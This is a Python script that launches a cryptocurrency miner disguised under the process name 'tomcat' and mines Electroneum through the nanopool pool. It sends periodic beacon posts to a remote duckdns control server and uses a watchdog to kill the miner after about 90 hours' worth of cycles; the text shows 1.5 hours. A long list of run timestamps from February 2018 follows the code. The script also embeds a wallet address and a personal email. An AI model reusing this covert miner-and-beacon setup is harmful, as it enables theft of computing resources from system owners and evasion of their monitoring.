import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:23:06.037012
#2018-02-17 16:09:07.364755
#2018-02-17 17:56:04.964942
#2018-02-17 19:46:02.176648
#2018-02-17 21:35:01.435705
#2018-02-17 23:19:05.023253
#2018-02-18 01:07:04.500774
#2018-02-18 02:54:05.776861
#2018-02-18 04:43:03.977098
#2018-02-18 06:35:06.118632
#2018-02-18 08:23:07.401615
#2018-02-18 10:11:06.811198
#2018-02-18 11:57:01.284047
#2018-02-18 13:41:07.740476
#2018-02-18 15:31:07.390948
#2018-02-18 17:19:01.381043
#2018-02-18 19:08:01.895082
#2018-02-18 20:54:05.164293
#2018-02-18 22:39:06.137157
#2018-02-19 00:28:04.604314
#2018-02-19 02:12:07.036557
#2018-02-19 03:59:01.962798
#2018-02-19 05:43:07.634453
#2018-02-19 07:31:05.306189
#2018-02-19 09:20:08.580573
#2018-02-19 11:10:05.398678
#2018-02-19 12:56:08.660977
#2018-02-19 14:43:08.826231
#2018-02-19 16:33:02.487623
#2018-02-19 18:18:07.342912
#2018-02-19 20:06:06.020229
#2018-02-19 21:54:04.769084
#2018-02-19 23:40:09.925697
#2018-02-20 01:27:04.156319
#2018-02-20 03:16:07.942622
#2018-02-20 05:02:06.654110
#2018-02-20 06:46:01.429131
#2018-02-20 08:32:05.063997
#2018-02-20 10:16:07.322640
#2018-02-20 12:01:04.344507
#2018-02-20 13:48:08.260575
#2018-02-20 15:32:08.089688
#2018-02-20 17:18:06.398966
#2018-02-20 19:07:05.976717
#2018-02-20 20:57:03.618161
#2018-02-20 22:42:06.793343
#2018-02-21 00:23:01.712412
#2018-02-21 02:07:05.798952
#2018-02-21 03:55:08.814522
#2018-02-21 05:43:01.448299
#2018-02-21 07:31:04.010829
#2018-02-21 09:15:08.126200
#2018-02-21 11:03:10.039604
#2018-02-21 12:51:09.191089
#2018-02-21 14:40:02.442418
#2018-02-21 16:26:03.048773
#2018-02-21 18:17:09.588401
#2018-02-21 20:02:08.221977
#2018-02-21 21:50:08.173365
#2018-02-21 23:37:01.458409
#2018-02-22 01:25:03.702019
#2018-02-22 03:14:05.695853
#2018-02-22 05:01:01.534513
#2018-02-22 06:44:01.594927
#2018-02-22 08:32:05.040464
#2018-02-22 10:18:09.116327
#2018-02-22 12:03:11.478994
#2018-02-22 13:48:01.466643
#2018-02-22 15:36:04.637268
#2018-02-22 17:21:06.553238
#2018-02-22 19:08:07.159473
#2018-02-22 20:59:08.640108
#2018-02-22 22:45:10.278675
#2018-02-23 00:32:04.819795
#2018-02-23 02:17:07.196183
#2018-02-23 04:06:04.262745
#2018-02-23 05:53:01.791673
#2018-02-23 07:40:06.675382
#2018-02-23 09:43:01.302739
#2018-02-23 11:49:02.135053
#2018-02-23 13:38:08.551182
#2018-02-23 15:27:06.250745
#2018-02-23 17:14:05.751485
#2018-02-23 18:58:01.809220
#2018-02-23 20:44:06.497793
#2018-02-23 22:32:06.951700
#2018-02-24 00:19:07.680768
#2018-02-24 02:11:04.318896
#2018-02-24 04:02:05.556362
#2018-02-24 05:47:06.934525
#2018-02-24 07:37:01.735928
#2018-02-24 09:22:05.562402
#2018-02-24 11:16:07.864242
#2018-02-24 13:06:01.941349
#2018-02-24 14:57:06.579629
#2018-02-24 16:48:02.096622
#2018-02-24 18:36:07.805966
#2018-02-24 20:25:04.074534
#2018-02-24 22:21:03.678675
#2018-02-25 01:28:06.317786
#2018-02-25 05:23:07.026746
#2018-02-25 11:34:01.780101